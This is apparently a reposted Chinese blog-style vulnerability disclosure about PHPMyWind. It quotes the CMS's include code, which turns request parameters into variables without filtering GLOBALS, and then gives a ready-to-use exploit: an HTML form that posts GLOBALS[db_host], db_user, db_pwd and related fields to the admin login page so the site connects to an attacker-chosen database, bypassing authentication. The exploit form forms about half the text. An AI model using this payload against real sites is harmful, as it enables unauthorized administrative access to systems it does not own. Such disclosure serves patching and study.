代码：
 
 
 
define('PHPMYWIND_INC', preg_replace("/[\/\\\\]{1,}/", '/', dirname(__FILE__)));
define('PHPMYWIND_ROOT', preg_replace("/[\/\\\\]{1,}/", '/', substr(PHPMYWIND_INC, 0, -8)));
define('PHPMYWIND_DATA', PHPMYWIND_ROOT.'/data');
define('PHPMYWIND_UPLOAD', PHPMYWIND_ROOT.'/uploads');
define('PHPMYWIND_BACKUP', PHPMYWIND_DATA.'/backup');
define('IN_PHPMYWIND', TRUE); //发放登入牌
 
 
 
//检查外部传递的值，将// ' ""类型数据进行转义
function _RunMagicQuotes(&$strvar)
{
 if(!get_magic_quotes_gpc())
 {
  if(is_array($strvar))
  {
   foreach($strvar as $_key => $_value) $strvar[$_key] = _RunMagicQuotes($_value);
  }
  else
  {
   $strvar = trim(addslashes($strvar));
  }
 }
 return $strvar;
}
 
 
//直接应用变量名称替代
foreach(array('_GET','_POST','_COOKIE') as $_request)
{
 foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
 
 
//Session保存路径 www.2cto.com
$sess_savepath = PHPMYWIND_DATA.'/sessions/';
if(is_writable($sess_savepath) && is_readable($sess_savepath))
{
 session_save_path($sess_savepath);
}
 
 
//上传文件保存路径
$cfg_image_dir = PHPMYWIND_UPLOAD.'/image';
$cfg_soft_dir  = PHPMYWIND_UPLOAD.'/soft';
$cfg_media_dir = PHPMYWIND_UPLOAD.'/media';
 
 
 
//系统版本号
$cfg_version = file_get_contents(PHPMYWIND_DATA."/update/version.txt");
 
 
//全局配置文件
require_once(PHPMYWIND_INC.'/config.cache.php');
 
 
//全局常用函数
require_once(PHPMYWIND_INC.'/common.func.php');
 
 
//引入数据库类
require_once(PHPMYWIND_INC.'/conn.inc.php');
 
.....略
 
有部分是抄dede的  而dede有检测key中是否包含GLOBALS等关键字。只是没考虑多维
 
 
 
而在本文中给出的代码中并没有任何检测。导致GLOALS被注册
 
 
 
exp:
 
 
<html>
<head><title>PHPMyWind Exp</title></head>
<body>
 
<div class="login_warp"> <div class="login_area">  <form name="login" method="post" action=http://www.2cto.com /act/admin/login.php onSubmit="return CheckForm()">  
<input type="text" name="username" id="username" class="login_area_input" maxlength="20" />  
<input type="password" name="password" id="password" class="login_area_input mar8" maxlength="16" />
      <input type="text" name="GLOBALS[db_host]" value="localhost" maxlength="16" />
           <input type="text" name="GLOBALS[db_user]" value="root" maxlength="16" />
         <input type="text" name="GLOBALS[db_pwd]" value="123456" maxlength="16" />
           <input type="text" name="GLOBALS[db_name]" value="db_name" maxlength="16" />
         <input type="text" name="GLOBALS[db_tablepre]" value="pwm_admin" maxlength="16" />
                            
   <div class="check_str">    <input type="text" name="validate" class="login_area_ckstr" id="validate" maxlength="4" />    <span><img id="ckstr" name="ckstr" src="../data/captcha/ckstr.php" title="看不清？点击更换" align="absmiddle" style="cursor:pointer;" onClick="this.src=this.src+'?'" /> <a href="javascript:;" onClick="var v=document.getElementById('ckstr');v.src=v.src+'?';return false;">看不清?</a></span></div>   <div class="hr_20"></div>   <input type="submit" class="login_area_btn" value="提交" style="cursor:pointer;" />   <input type="hidden" name="dopost" value="login" />  </form> </div>
 
 
</body>
</html>
 
 
作者：Samy      出处：http://hi.baidu.com/0x7362/blog